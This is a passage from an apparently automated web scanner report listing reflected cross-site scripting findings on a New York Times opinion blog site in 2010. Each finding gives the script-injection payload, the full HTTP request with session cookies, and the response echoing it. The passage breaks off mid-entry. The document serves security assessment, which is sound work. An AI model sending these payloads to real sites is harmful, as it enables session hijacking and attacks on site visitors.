Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:16:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:16:58 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/dick-cavettea706\"><script>alert(1)</script>3b4fefc3f96&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.183. http://opinionator.blogs.nytimes.com/category/dick-cavett/feed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/dick-cavett/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57e8a"><script>alert(1)</script>fe172a7552a was submitted in the REST URL parameter 3. This input was echoed as 57e8a\"><script>alert(1)</script>fe172a7552a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/dick-cavett/feed57e8a"><script>alert(1)</script>fe172a7552a/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:13:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:13:29 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/dick-cavett/feed57e8a\"><script>alert(1)</script>fe172a7552a&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.184. http://opinionator.blogs.nytimes.com/category/dick-cavett/page/2/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/dick-cavett/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60706"><script>alert(1)</script>51866edec90 was submitted in the REST URL parameter 3. This input was echoed as 60706\"><script>alert(1)</script>51866edec90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/dick-cavett/page60706"><script>alert(1)</script>51866edec90/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:18:21 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:18:21 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/dick-cavett/page60706\"><script>alert(1)</script>51866edec90/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.185. http://opinionator.blogs.nytimes.com/category/disunion [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/disunion

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83d78"><script>alert(1)</script>084625fe73a was submitted in the REST URL parameter 2. This input was echoed as 83d78\"><script>alert(1)</script>084625fe73a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/disunion83d78"><script>alert(1)</script>084625fe73a HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:25:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:25:14 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/disunion83d78\"><script>alert(1)</script>084625fe73a&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.186. http://opinionator.blogs.nytimes.com/category/disunion/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/disunion/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1378a"><script>alert(1)</script>0da3b8f72d1 was submitted in the REST URL parameter 2. This input was echoed as 1378a\"><script>alert(1)</script>0da3b8f72d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/disunion1378a"><script>alert(1)</script>0da3b8f72d1/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:25:18 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:25:18 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/disunion1378a\"><script>alert(1)</script>0da3b8f72d1&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.187. http://opinionator.blogs.nytimes.com/category/disunion/feed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/disunion/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f948"><script>alert(1)</script>7bb52e55484 was submitted in the REST URL parameter 3. This input was echoed as 6f948\"><script>alert(1)</script>7bb52e55484 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/disunion/feed6f948"><script>alert(1)</script>7bb52e55484/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:22:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:22:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/disunion/feed6f948\"><script>alert(1)</script>7bb52e55484&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.188. http://opinionator.blogs.nytimes.com/category/disunion/page/2/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/disunion/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf645"><script>alert(1)</script>7bdf5d8d7cb was submitted in the REST URL parameter 3. This input was echoed as bf645\"><script>alert(1)</script>7bdf5d8d7cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/disunion/pagebf645"><script>alert(1)</script>7bdf5d8d7cb/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:25:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:25:33 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/disunion/pagebf645\"><script>alert(1)</script>7bdf5d8d7cb/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.189. http://opinionator.blogs.nytimes.com/category/errol-morris [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/errol-morris

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9789f"><script>alert(1)</script>f993fd38ae8 was submitted in the REST URL parameter 2. This input was echoed as 9789f\"><script>alert(1)</script>f993fd38ae8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/errol-morris9789f"><script>alert(1)</script>f993fd38ae8 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:21:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:21:33 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/errol-morris9789f\"><script>alert(1)</script>f993fd38ae8&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.190. http://opinionator.blogs.nytimes.com/category/errol-morris/feed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/errol-morris/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83ca0"><script>alert(1)</script>a5cfaeb2d66 was submitted in the REST URL parameter 3. This input was echoed as 83ca0\"><script>alert(1)</script>a5cfaeb2d66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/errol-morris/feed83ca0"><script>alert(1)</script>a5cfaeb2d66/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:18:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:18:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/errol-morris/feed83ca0\"><script>alert(1)</script>a5cfaeb2d66&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.191. http://opinionator.blogs.nytimes.com/category/errol-morris/page/2/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/errol-morris/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59656"><script>alert(1)</script>2a52a42ee88 was submitted in the REST URL parameter 3. This input was echoed as 59656\"><script>alert(1)</script>2a52a42ee88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/errol-morris/page59656"><script>alert(1)</script>2a52a42ee88/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:22:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:22:17 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/errol-morris/page59656\"><script>alert(1)</script>2a52a42ee88/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.192. http://opinionator.blogs.nytimes.com/category/fixes [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/fixes

Issue detail

